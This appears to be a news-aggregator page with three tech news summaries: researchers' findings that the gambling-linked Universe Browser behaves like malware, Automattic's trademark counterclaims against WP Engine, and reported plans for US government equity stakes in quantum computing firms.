A web browser linked to Chinese online gambling websites and downloaded millions of times routes all internet traffic through servers in China and covertly installs programs that run in the background, according to findings published by network security company Infoblox. The researchers said the Universe Browser, which advertises itself as offering privacy protection, includes features similar to malware such as key logging and surreptitious connections.

Infoblox collaborated with the United Nations Office on Drugs and Crime on the research. The investigators found links between the browser and Southeast Asia's cybercrime ecosystem, which has connections to money laundering, illegal online gambling, human trafficking and scam operations using forced labor. The browser is directly linked to BBIN, a major online gambling company that has existed since 1999. Infoblox researchers examined the Windows version of the browser and found that it checks users' locations and languages when launched, installs two browser extensions, and disables security features including sandboxing.
The Courts

WordPress Maker Files Counterclaims Against WP Engine Over Trademark Use (techcrunch.com) 9

Automattic has filed counterclaims against WP Engine in a lawsuit the hosting company initiated in October 2024. The counterclaims accuse WP Engine of trademark infringement and deceptive marketing practices. After private equity firm Silver Lake invested $250 million in WP Engine, the hosting company began calling itself "The WordPress Technology Company" and allowed partners to refer to it as "WordPress Engine," the lawsuit says. WP Engine also launched products named "Core WordPress" and "Headless WordPress."

The counterclaims allege that WP Engine promised to commit 5% of its resources to the WordPress ecosystem but failed to keep those promises. Automattic contends that WP Engine engaged in trademark violations to avoid licensing fees that would have affected the company's earnings and valuation. Silver Lake sought to sell WP Engine at a $2 billion valuation but could not find a buyer. The filing notes that potential buyers included Automattic. The counterclaims also assert that WP Engine degraded product quality and removed essential features to reduce costs during this period.
Government

Trump Eyes Government Control of Quantum Computing Firms (arstechnica.com) 109

An anonymous reader quotes a report from Ars Technica: Donald Trump is eyeing taking equity stakes in quantum computing firms in exchange for federal funding, The Wall Street Journal reported. At least five companies are weighing whether allowing the government to become a shareholder would be worth it to snag funding that the Trump administration has "earmarked for promising technology companies," sources familiar with the potential deals told the WSJ.

IonQ, Rigetti Computing, and D-Wave Quantum are currently in talks with the government over potential funding agreements, with minimum awards of $10 million each, some sources said. Quantum Computing Inc. and Atom Computing are reportedly "considering similar arrangements," as are other companies in the sector, which is viewed as critical for scientific advancements and next-generation technologies. No deals have been completed yet, sources said, and terms could change as quantum-computing firms weigh the potential risks of government influence over their operations. [...]

The administration will lean on Deputy Commerce Secretary Paul Dabbar to extend Trump's industry meddling into the quantum computing world, the WSJ reported. A former Energy Department official, Dabbar co-founded Bohr Quantum Technology, which specializes in quantum networking systems that the DOE expects will help "create new opportunities for scientific discovery." While the firm he previously headed won't be eligible for funding, Dabbar will be leading industry discussions, the WSJ reported, likely hyping Trump's deals as a necessary boon to ensure US firms dominate in quantum computing.
A Commerce Department official denied the claims, saying: "The Commerce Department is not currently negotiating equity stakes with quantum computing companies."

In August, the Trump administration took a 10% stake in Intel to help fund factories that Intel is currently building in Ohio.
